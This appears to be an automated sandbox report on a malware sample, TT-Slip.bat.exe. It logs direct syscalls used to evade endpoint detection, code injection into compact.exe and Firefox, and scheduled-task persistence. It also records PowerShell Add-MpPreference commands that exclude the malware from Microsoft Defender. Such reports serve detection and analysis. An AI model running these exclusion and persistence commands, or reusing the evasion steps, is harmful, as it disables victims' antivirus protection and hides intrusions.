
Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	NtCreateKey: Direct from: 0x76EF2C6C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory written: C:\Users\user\Desktop\TT-Slip.bat.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory written: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: NULL target: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread register set: target process: 7848

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread APC queued: target process: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Users\user\Desktop\TT-Slip.bat.exe "C:\Users\user\Desktop\TT-Slip.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: ISsofSsdrAsp.exe, 00000010.00000000.2300987633.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4515166768.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000000.2440271475.0000000001351000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: ISsofSsdrAsp.exe, 00000010.00000000.2300987633.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4515166768.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000000.2440271475.0000000001351000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ISsofSsdrAsp.exe, 00000010.00000000.2300987633.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4515166768.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000000.2440271475.0000000001351000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ISsofSsdrAsp.exe, 00000010.00000000.2300987633.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4515166768.0000000000EF1000.00000002.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000000.2440271475.0000000001351000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Queries volume information: C:\Users\user\Desktop\TT-Slip.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Queries volume information: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
